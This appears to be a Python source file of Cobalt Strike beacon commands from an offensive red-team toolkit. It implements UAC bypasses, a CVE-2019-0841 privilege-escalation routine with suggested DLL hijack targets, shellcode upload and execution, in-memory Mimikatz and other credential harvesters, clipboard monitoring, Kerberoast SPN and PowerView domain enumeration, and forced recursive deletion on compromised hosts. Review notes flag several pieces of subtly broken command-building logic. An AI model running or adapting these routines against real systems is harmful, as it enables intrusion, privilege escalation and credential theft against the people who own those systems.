def _(bid, pattern, out=None):
    """Run Get-IndexedFiles for `pattern` on the beacon, optionally redirecting to `out`.

    Both `pattern` and `out` go through powershell_quote before being placed
    on the command line; `out` is a path on the target host.
    """
    import_host_recon(bid)
    parts = ['Get-IndexedFiles {}'.format(powershell_quote(pattern))]
    if out:
        # redirect the cmdlet output to a file on the target
        parts.append('> {}'.format(powershell_quote(out)))
    aggressor.bpowerpick(bid, ' '.join(parts))
def run(bid, program, args=None, silent=False):
    """Dispatch `program` to one of the registered runner tables.

    `program` is looked up, in order, in the module-level `assemblies`,
    `powershell` and `callbacks` mappings (presumably defined elsewhere in
    this file):

    - assemblies: the argument list is passed through helpers.eaq (semantics
      not visible here) and run with aggressor.bexecute_assembly; a btask
      message is emitted unless `silent`.
    - powershell: the stored script is imported with bpowershell_import and
      then invoked with bpowerpick. `silent` is not consulted on this path.
    - callbacks: the stored callable is invoked as callback(bid, args, silent=silent).

    Args:
        bid: beacon id.
        program: key to look up in the tables above.
        args: list/tuple of arguments; a falsy value is treated as an empty list.
        silent: suppress the btask message for assemblies; forwarded to callbacks.

    Raises:
        RuntimeError: if `program` is in none of the three tables.
    """
    # no args
    if not args:
        args = []
    if program in assemblies:
        assembly = assemblies[program]
        args = helpers.eaq(args)
        if not silent:
            aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args))
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)
        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))
        # NOTE(review): once `args` is a str (always the case after the join
        # above), ' '.join(args) puts a space between every character rather
        # than between arguments — confirm this is the intended command line.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    Three files are uploaded into the directory returned by
    helpers.guess_temp(bid): tools/execute_assembly.exe (stage1),
    tools/execute_shellcode.exe (stage2) and `shellcode` (package). Invoke-TokenDuplication
    from modules/FilelessUACBypass.ps1 is then run with stage2 as -Binary, and
    all three uploaded files are removed with brm afterwards.

    Args:
        bid: beacon id.
        shellcode: presumably a local file path, like the two tool paths it is
            uploaded alongside (helpers.upload_to is opaque here).

    Note: stage1 is uploaded and removed but not referenced by the command
    built in this function.
    """
    aggressor.bpowershell_import(bid, utils.basedir('modules/FilelessUACBypass.ps1'))
    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)
    command = 'Invoke-TokenDuplication -Binary {}'.format(powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)
    # clean up everything that was uploaded
    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass.

    Imports modules/FilelessUACBypass.ps1 into the beacon and runs
    Invoke-SluiBypass with `command` (powershell_quote'd) as -Command.
    """
    module = utils.basedir('modules/FilelessUACBypass.ps1')
    aggressor.bpowershell_import(bid, module)
    invocation = 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def _(bid, out=None):
    """Import powershell/UserSPN.ps1 and run Get-AccountSPNs, optionally redirecting to `out`."""
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))
    parts = ['Get-AccountSPNs']
    if out:
        # redirect the cmdlet output to a file on the target
        parts.append('> {}'.format(powershell_quote(out)))
    aggressor.bpowerpick(bid, ' '.join(parts))
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass.

    Imports modules/Invoke-EventVwrBypass.ps1 into the beacon and runs
    Invoke-EventVwrBypass with `command` (powershell_quote'd) as -Command.
    """
    module = utils.basedir('modules/Invoke-EventVwrBypass.ps1')
    aggressor.bpowershell_import(bid, module)
    invocation = 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass.

    Imports modules/Invoke-WScriptBypassUAC.ps1 into the beacon and runs
    Invoke-WScriptBypassUAC with `command` (powershell_quote'd) as -payload.
    """
    module = utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')
    aggressor.bpowershell_import(bid, module)
    invocation = 'Invoke-WScriptBypassUAC -payload {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
    overwrite 'target' with 'overwrite'.

    Good overwrite options:
     - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
     - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait
       for google update or run it manually)

    Args:
        bid: beacon id.
        target: path on the target host; passed through powershell_quote before
            being interpolated into the script below.
        overwrite: optional local file. When given it is uploaded over `target`
            with helpers.upload_to and helpers.explorer_stomp(bid, target) is
            called afterwards.

    Both the Native-HardLink.ps1 import and the bpowerpick run are silent.
    """
    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
    # fixed literals, interpolated into the script without quoting
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'
    # doubled braces ({{ }}) survive .format() as PowerShell script-block braces
    command = helpers.code_string(r"""
# Stop Edge
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{ $process | Stop-Process }}
sleep 3

# Hardlink
$edge_dir = Resolve-Path {edge_dir}
$settings_dat = $edge_dir.Path + '{settings_dat}'
echo "[.] Making Hardlink from $settings_dat to {target}"
rm $settings_dat
Native-HardLink -Verbose -Link $settings_dat -Target {target}

# Start Edge
echo "[.] Starting Edge"
Start Microsoft-Edge:
sleep 3

# Stop it again
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{ $process | Stop-Process }}

echo "[+] All Finished!"
echo "[.] New ACLs:"
Get-Acl {target} | Format-List
""".format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target)))
    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)
    if overwrite:
        helpers.upload_to(bid, overwrite, target)
        helpers.explorer_stomp(bid, target)
def elevate_token_command(bid, command, *other_args):
    """
    Elevate with token duplication bypass. Execute `command` with `arguments`.

    `command` is split on whitespace: the first word becomes -Binary and the
    remaining words, if any, are re-joined with single spaces and passed as
    -Arguments (both powershell_quote'd). Any `other_args` are appended to the
    Invoke-TokenDuplication command line verbatim, without quoting.

    Args:
        bid: beacon id.
        command: binary followed by its arguments, as one whitespace-separated string.
        *other_args: extra Invoke-TokenDuplication switches, appended as given.
    """
    # note: a binary path that itself contains spaces is split here as well
    command, *arguments = command.split()
    aggressor.bpowershell_import(bid, utils.basedir('modules/FilelessUACBypass.ps1'))
    powershell = 'Invoke-TokenDuplication -Binary {} '.format(powershell_quote(command))
    if arguments:
        powershell += '-Arguments {} '.format(powershell_quote(' '.join(arguments)))
    if other_args:
        # caller is responsible for any quoting of these
        powershell += ' '.join(other_args)
    aggressor.bpowerpick(bid, powershell)
def _(bid, *dirs):
    """List the entries two levels below each directory in `dirs` (default: '.') with ls."""
    targets = list(dirs) if dirs else ['.']
    globs = [powershell_quote('{}\*\*'.format(d)) for d in targets]
    aggressor.btask(bid, 'Tasked beacon to list */* in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, 'ls ' + ', '.join(globs), silent=True)
def _(bid, *dirs):
    """Recursively and forcibly delete every directory in `dirs` (Remove-Item -Recurse -Force).

    Reports an error via berror and returns if no directory was given.
    """
    if not dirs:
        aggressor.berror(bid, 'rmr: specify some directories to kill')
        return
    removals = ['Remove-Item -Recurse -Force {}\n'.format(powershell_quote(d)) for d in dirs]
    aggressor.btask(bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, ''.join(removals), silent=True)
def _(bid, *dirs):
    """Recursively list (Get-ChildItem -Recurse) each directory in `dirs`, defaulting to '.'."""
    targets = list(dirs) if dirs else ['.']
    listing = ''.join('Get-ChildItem -Recurse {}\n'.format(powershell_quote(d)) for d in targets)
    aggressor.btask(bid, 'Tasked beacon to recursively list files in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, listing, silent=True)
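def _(bid, *hosts):
    """Resolve each name in `hosts` on the beacon with nslookup, one call per host.

    Reports an error via berror and returns if no host was given.

    Args:
        bid: beacon id.
        *hosts: names to resolve; each is quoted with powershell_quote.
    """
    if not hosts:
        # berror takes the beacon id first, as every other berror call in this file does
        aggressor.berror(bid, 'specify a host')
        return
    command = ''.join('nslookup {}\n'.format(powershell_quote(host)) for host in hosts)
    aggressor.btask(bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
    aggressor.bpowerpick(bid, command, silent=True)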
def _(bid, *dirs):
    """For each directory in `dirs` (default '.'), query every child's reparse point with fsutil."""
    targets = list(dirs) if dirs else ['.']
    # doubled braces survive .format() as the PowerShell script-block braces
    template = 'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'
    script = ''.join(template.format(powershell_quote(d)) for d in targets)
    aggressor.btask(bid, 'Tasked beacon to list links in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, *lnks):
    """Resolve each shortcut in `lnks` through the WScript.Shell COM object and echo its target.

    Args:
        bid: beacon id.
        *lnks: shortcut paths on the target; each is powershell_quote'd.
    """
    command = '$sh = New-Object -ComObject WScript.Shell'
    for lnk in lnks:
        # NOTE(review): the echo below references $target, which is only
        # assigned in the commented-out PowerShell lines — confirm the output
        # is what is expected.
        command += helpers.code_string(r"""
$shortcut = $sh.CreateShortcut({})
#$target = $shortcut.TargetPath
#$arguments = $target.Arguments
#echo "$target $arguments"
echo "$shortcut.TargetPath $target.Arguments"
""".format(powershell_quote(lnk)))
    aggressor.btask(bid, 'Tasked beacon to read links: {}'.format(', '.join(lnks)))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, command, *args):
    """Host Invoke-Mimikatz.ps1 via the beacon and run Invoke-Mimikatz -Command `command` `args`.

    The script is read from powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,
    handed to aggressor.beacon_host_script, and the loader command that call
    returns is echoed with engine.message and then prepended to the
    Invoke-Mimikatz invocation in a single bpowerpick.

    Args:
        bid: beacon id.
        command: interpolated into the command line unquoted.
        *args: extra arguments, each passed through powershell_quote.
    """
    script_file = utils.basedir('powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_file, 'r') as fp:
        script = fp.read()
    # host it
    cmd = aggressor.beacon_host_script(bid, script)
    # NOTE(review): fixed 10 s wait before the hosted script is used —
    # presumably to let hosting complete; confirm whether it is needed.
    time.sleep(10)
    # execute in-memory hosted script
    engine.message(cmd)
    aggressor.bpowerpick(bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format(command, ' '.join(powershell_quote(args))))
def _(bid, *dirs):
    """List each directory in `dirs` (default '.') sorted by LastWriteTime, oldest first."""
    # default dir is .
    if not dirs:
        dirs = ['.']
    #command += "Where-Object { -not \$_.PsIsContainer } |
    command = ''
    for d in dirs:
        command += helpers.code_string(r"""
Get-ChildItem -Path {} | Sort-Object LastWriteTime -Ascending;
""".format(powershell_quote(d)))
    aggressor.btask(bid, 'Tasked beacon to do a sorted-by-time list of: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, url):
    """Fetch the HTTP response headers of `url` on the beacon and print them as Key/Value rows.

    Args:
        bid: beacon id.
        url: URL to request; 'http://' is prepended when it contains no ':'.
    """
    if ':' not in url:
        # add scheme
        url = 'http://' + url
    command = helpers.code_string(r"""
$request = [System.Net.WebRequest]::Create({})
""".format(powershell_quote(url)))
    # kept out of .format() because this part uses literal braces
    command += helpers.code_string(r"""
$response = $request.GetResponse()
$headers = $response.Headers
$headers.AllKeys | Select-Object @{ Name = "Key"; Expression = { $_ }}, @{ Name = "Value"; Expression = { $headers.GetValues( $_ ) } }
""")
    aggressor.btask(bid, 'Tasked beacon to get headers for URL: {}'.format(url))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid): temp = helpers.guess_temp(bid) # Forests and trusts: # Get-DomainTrustMapping # Get-ForestTrust # Get-DomainTrust # Parsing GPOs: # Get-GptTmpl # Get-GroupsXML # File shares: # Get-DomainFileServer # Get-DomainDFSShare # Get-DomainManagedSecurityGroup? # TODO remove subnet and site? # computer objects don't show up in Get-DomainObject for some reason command = helpers.code_string(r""" cd {} $FormatEnumerationLimit=-1 Get-DomainObject | Format-List -Property * > objects.domain Get-DomainPolicyData | Format-List -Property * > policy.domain Get-DomainSite | Format-List -Property * > sites.domain Get-DomainSubnet | Format-List -Property * > subnets.domain Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain Get-GPODelegation | Format-List -Property * > gpo_delegations.domain Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain Get-DomainTrustMapping | Format-List -Property * > trusts.domain Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain echo "All finished with domain-enum. Run domain-enum-next." """.format(powershell_quote(temp))) aggressor.btask( bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)') external.run(bid, 'powerview', command)
def _(bid, *dirs):
    """Report the total size (MB) of each entry under the directories in `dirs` (default '.').

    Each directory gets its own `gci ... |` pipeline; the measurement stage is
    appended unformatted because it uses literal braces.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']
    command = ''
    for d in dirs:
        command += """
gci {} |
""".format(powershell_quote(d))
        command += helpers.code_string(r"""
%{$f=$_; gci -r $_.FullName |
measure-object -property length -sum |
select @{Name="Name"; Expression={$f}}, @{Name="Sum (MB)"; Expression={"{0:N3}" -f ($_.sum / 1MB) }}, Sum } |
sort Sum -desc |
format-table -Property Name,"Sum (MB)", Sum -autosize;
""")
    aggressor.btask(bid, 'Tasked beacon to get file sizes in: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
    """`find`-style file search on the beacon, built from a gci pipeline.

    Parses `args` with helpers.ArgumentParser (prog 'find'); a parse failure
    returns without tasking the beacon. Name filters (-n exact-case, -i
    case-insensitive) are OR'ed together and may be inverted with --not;
    directories are excluded unless --dirs; output may be redirected with -o.
    The bpowerpick call is silent unless -v is given.
    """
    parser = helpers.ArgumentParser(bid=bid, prog='find')
    parser.add_argument('-n', '--name', action='append', help='Name to match')
    parser.add_argument('-i', '--iname', action='append', help='Name to match (case insensitive)')
    parser.add_argument('--not', dest='not_', action='store_true', help='Invert --name and --iname')
    parser.add_argument('-d', '--days', type=int, help='Select files no more than DAYS old')
    parser.add_argument('--dirs', action='store_true', help='Include directories')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose')
    # NOTE(review): argparse %-formats help text, so a literal %USERPROFILE% may
    # need to be written %%USERPROFILE%% — confirm against helpers.ArgumentParser.
    parser.add_argument('--home', action='store_true', help='Search relative to %USERPROFILE% instead of .')
    # NOTE(review): a positional with default= is still required unless
    # nargs='?' — confirm whether `dir` is meant to be optional.
    parser.add_argument('dir', default='.', help='Directory to search from (default: .)')
    try:
        args = parser.parse_args(args)
    except:
        # presumably catches the parser's error exit; nothing is tasked
        return
    # --home
    if args.home:
        directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir))
    else:
        directory = powershell_quote(args.dir)
    command = 'gci -Recurse -Path {} 2>$null'.format(directory)
    # --dirs
    if not args.dirs:
        command += ' | where { ! $_.PSIsContainer }'
    name_matches = []
    # -n/--name
    if args.name:
        for name in args.name:
            name_matches.append('$_.Name -Clike {}'.format(powershell_quote(name)))
    # -i/--iname
    if args.iname:
        for iname in args.iname:
            name_matches.append('$_.Name -Like {}'.format(powershell_quote(iname)))
    if name_matches:
        where_statement = ' -Or '.join(name_matches)
        # --not
        if args.not_:
            where_statement = '-Not ({})'.format(where_statement)
        command += " | Where-Object { " + where_statement + " }"
    # -d/--days
    if args.days:
        # NOTE(review): the -{} placeholder is not .format()ed with args.days
        # here, so it reaches PowerShell literally — confirm.
        command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'
    # -o/--out
    if args.out:
        command += ' > {}'.format(powershell_quote(args.out))
    command += "; echo 'Finished searching in {}'".format(directory)
    aggressor.btask(bid, 'Tasked beacon to search for files in {}'.format(directory))
    # -v/--verbose
    aggressor.bpowerpick(bid, command, silent=not args.verbose)
def _(bid, *exes):
    """Print "name, FileDescription" for each executable in `exes` using FileVersionInfo.

    Raises:
        RuntimeError: if no executable was given.
    """
    command = ''
    if not exes:
        raise RuntimeError('describe: Specify at least one exe to describe')
    for exe in exes:
        # NOTE(review): the fragment references $_ and ends with a closing
        # brace but nothing here opens a script block or pipeline — the
        # leading part of the command appears to be missing; confirm.
        command += '"{0}, {1}" -f $_.Name, [System.Diagnostics.FileVersionInfo]::GetVersionInfo(' + powershell_quote(exe) + ').FileDescription }\n'
    aggressor.btask(bid, 'Tasked beacon to show version info for: {}'.format(', '.join(exes)))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
    """Import powershell/SessionGopher.ps1 into the beacon and run Invoke-SessionGopher with `args`."""
    script = utils.basedir('powershell/SessionGopher.ps1')
    aggressor.bpowershell_import(bid, script)
    extra = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Invoke-SessionGopher ' + extra)
def _(bid, *args):
    """Import powershell/Invoke-NetRipper.ps1 and run it with a fixed -LogLocation plus `args`."""
    script = utils.basedir('powershell/Invoke-NetRipper.ps1')
    aggressor.bpowershell_import(bid, script)
    prefix = r'Invoke-NetRipper -LogLocation C:\Temp\ '
    aggressor.bpowerpick(bid, prefix + ' '.join(powershell_quote(args)))
def _(bid, *args):
    """Import powershell/Start-ClipboardMonitor.ps1 into the beacon and start it with `args`."""
    script = utils.basedir('powershell/Start-ClipboardMonitor.ps1')
    aggressor.bpowershell_import(bid, script)
    quoted = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(quoted))
def _(bid, url):
    """Fetch `url` on the beacon with WebClient.DownloadString and print the body."""
    fetch = '(New-Object System.Net.WebClient).DownloadString({})'
    aggressor.bpowerpick(bid, fetch.format(powershell_quote(url)))
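def _(bid, fname, lines=10):
    """Print the last `lines` lines of `fname` on the beacon (gc ... | select -last N).

    Args:
        bid: beacon id.
        fname: path on the target; quoted with powershell_quote.
        lines: number of trailing lines to show (default 10).
    """
    # btask takes the beacon id first, as every other btask call in this file does
    aggressor.btask(bid, 'Tasked beacon to get tail of {}'.format(fname))
    aggressor.bpowerpick(bid, 'gc {} | select -last {} '.format(powershell_quote(fname), lines), silent=True)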